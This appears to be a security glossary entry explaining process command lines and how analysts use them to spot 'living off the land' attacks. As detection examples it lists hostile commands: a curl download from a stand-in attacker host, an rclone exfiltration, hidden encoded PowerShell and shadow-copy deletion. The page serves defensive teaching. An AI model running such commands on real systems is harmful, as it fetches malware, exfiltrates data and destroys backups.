Process_commandline

Definition

A process command line is the **exact text used to launch a process** on a computer, including the program name and any arguments or options passed to it.

If a process is the running instance of a program, the command line is essentially the “recipe” that started it. It tells you:

* **What executable was run** (`powershell.exe`, `python.exe`, `cmd.exe`)
* **Where it was run from** (file path)
* **What parameters or files were given to it** (scripts, commands, URLs, flags)

Example:

```
powershell.exe -ExecutionPolicy Bypass -File .\backup.ps1
```

Here, the process is `powershell.exe` and the arguments are `-ExecutionPolicy Bypass -File .\backup.ps1`.

In investigations, the process command line is a goldmine because attackers often use legitimate tools in suspicious ways — a technique known as **Living off the Land**. The command line can reveal:

* Malware execution paths (`C:\Users\Public\malware.exe`)
* Hidden scripts being run (`cmd.exe /c hidden.vbs`)
* Suspicious network calls (`curl http://evil.com/payload.exe -o C:\temp\bad.exe`)
* Data exfiltration attempts (`rclone copy C:\Data remote:bucket`)

Security tools and logs often capture the command line for each process so analysts can spot anomalies. For example, seeing `powershell.exe` isn’t always bad, but `powershell.exe -nop -w hidden -enc ...` (a long Base64 blob) is a major red flag.

Real-world examples:

* Many ransomware strains are caught early because their process command line reveals commands like `vssadmin delete shadows /all /quiet` (used to delete backups).
* The 2021 HAFNIUM Exchange Server attacks used suspicious `cmd.exe` and `powershell.exe` command lines to dump credentials and create web shells.

Process_commandline

Definition

Explore More Terms